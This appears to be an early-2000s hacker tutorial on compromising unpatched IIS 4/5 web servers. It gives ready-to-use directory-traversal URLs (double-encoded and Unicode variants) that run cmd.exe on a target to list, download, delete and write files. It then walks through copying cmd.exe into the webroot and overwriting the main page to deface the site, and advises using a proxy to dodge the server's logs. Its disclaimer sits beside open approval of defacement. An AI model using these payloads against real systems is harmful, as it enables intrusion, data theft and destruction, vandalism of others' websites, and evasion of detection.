|
All the stuff work on IIS 4,5 servers with with out any
security updates!
maac@mail1.stofanet.dk Made By Truti |
************ INTRO:
Hacking an iis server is pretty much like taking candy from
a baby. No really its that easy. In this tutorial im going
to walk you through 0wnz'ing your very own iis server and
show you haw to deface the site but i seriously dont
encourage this. I dont agree with needless defacing unless
its your first time, but im not against defacing to stand up
for your rights, punish a site with bad intensions(even
though the site can be rebuilt) or to make a strong point.
If your going to use the *i defaced your site because it
had bad security*, you could just as easily mail the admin.
Im telling you all how to do this so u know how easy it is.
Please dont abuse the information i give you.
---------------------------------------------
************ Finding vulnerable servers:
There are *many , many* vulnerabilities with iis but im
going to discuss one of the latest. This vulnerability
allow the execution of arbituary code.
To see if a site is vulnerable try these links
www.TARGET.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
www.TARGET.com/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
www.TARGET.com/cgi-bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
www.TARGET.com/samples/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
www.TARGET.com/iisadmpwd/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
www.TARGET.com/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/
system32/cmd.exe?/c+dir+c:\
www.TARGET.com/_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/
system32/cmd.exe?/c+dir+c:\
www.TARGET.com/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/
system32/cmd.exe?/c+dir+c:\
If the server is vulnerable you should get a listing of the
C drive.
If none of these links work, the server probably isn't
vulnerable.
Ok, so lets say you got a list or the c content, it should
look something like:
---------------------------------------------
Directory of c:\
11/15/02 08:50a (DIR) WINNT
11/15/02 09:15a (DIR) Program Files
11/15/02 09:20a (DIR) TEMP
11/15/02 09:21a (DIR) CPQ SYSTEM
11/15/02 09:50a (DIR) Inetpub
11/27/02 08:11a (DIR) CPQSUPSW
11/29/02 09:12a (DIR) CA_LIC
12/01/02 09:42a 140 server ip address.txt
04/06/02 04:44p 55,769 systemlog 06-04.txt
05/04/02 12:32p (DIR) test
10 File(s) 1,159,703,933 bytes
1,322,123,264 bytes free
---------------------------------------------
To navigate just change the links to:
/system32/cmd.exe?/c+dir+c:\winnt
For example to navigate to the WINNT directory
To navigate to a folder such as CPQ SYSTEM you would have
to put: /system32/cmd.exe?/c+dir+c:\cpqsys~1
There must be six characters before the ~1 and no spaces
(Normal rules DOS). Use DOS on your (or where ever there is
a win32 b0x) own pc, this will greatly help you when it
comes to using simple commands such as copy, or listing
content of a directory.
Now in order to find the main page of the website. We must
find the webroot. The webroot is the path in which all the
files for the site are held, including the main page. In my
experience the webroot is usually found on the D: drive but
it can be any directory the admin chooses.
Try: /system32/cmd.exe?/c+dir+d:\
This should list the content of the drive D drive. Also a
good tip, a lot of sites have *mock* webroots, in which you
think you have found the sites main page but its not really,
just a copy. You will have to visit the site and find the
size of the main page and the other pages linked to it
(right click and click properties - Normal win32 trik) and
then match it up with the files in the webroot to find the
real main page.
---------------------------------------
Now is a good time to give you some commands that will come
in useful:
To list all chosen files on the server use:
www.TARGET.com/whatever/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir%20/S%20c:\*.whatever
To DOWNLOAD a file use:
www.TARGET.com/whatever/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20type\c%20c:\whatever.file
When asked: What would you like to do with this file?
choose: *run this program from its current location*.
Choosing save to disk will get you a properties report of
that file or something like that.
To DELETE (del) a file use:
www.TARGET.com/whatever/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/
winnt/system32/cmd.exe?/c%20del%20c:\whatever.file
To make a text file use:
www.TARGET.com/whatever/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20echo%20You txt
goes here!!!!!>%20test.txt
--------------------------------------
************ Changing the mainpage.htm
Now on to the important part, editing the websites main
page. HTML is not needed but if you want to an in any way
decent looking deface you need to know it. If you dont know
it dont worry and text in a file with .htm or .html
extension will show up in a browser. If you want to learn
html it can be done by anybody, i learned the basics in
about 1 day. Ok, enough woman - girlie! talk, to the man
stupid - you have to copy the file CMD.exe to the directory
with the page in it, lets call this page,
wannabie_admin.html and lets say the directory
wannabie_admin.html is in is C:\home\site
So the COPY command:
www.TARGET.com/whatever/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20copy%20c:\winnt\system32\
cmd.exe%20C:\home\site\CMD.exe
That will copy CMD.exe (like command.com in win98) to
d:\home\site
now to paste the text we want into wannabie_admin.html:
www.TARGET.com/whatever/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
%c0%af..%c0%af/home/site/CMD.exe?/c%20echo%20Damn
Wannabies! You run IIS and you just been
cracked>%20wannabie_admin.html
Now your text should now be on the main page. If you echo
html code into wannabie_admin.html, youll get a much better
defacement. If your are going to do it, do it RIGHT!
--------------------------------------
Please, please listen to me, IIS servers >>>-LOG-<<< all
the stuff! so use a >>>-PROXY-<<<
or else pay the price!
--------------------------------------
BTW. a very use full tool are the Twwwscan... It can be
found at www.google.com!
Credits
maac@mail1.stofanet.dk Made By Truti |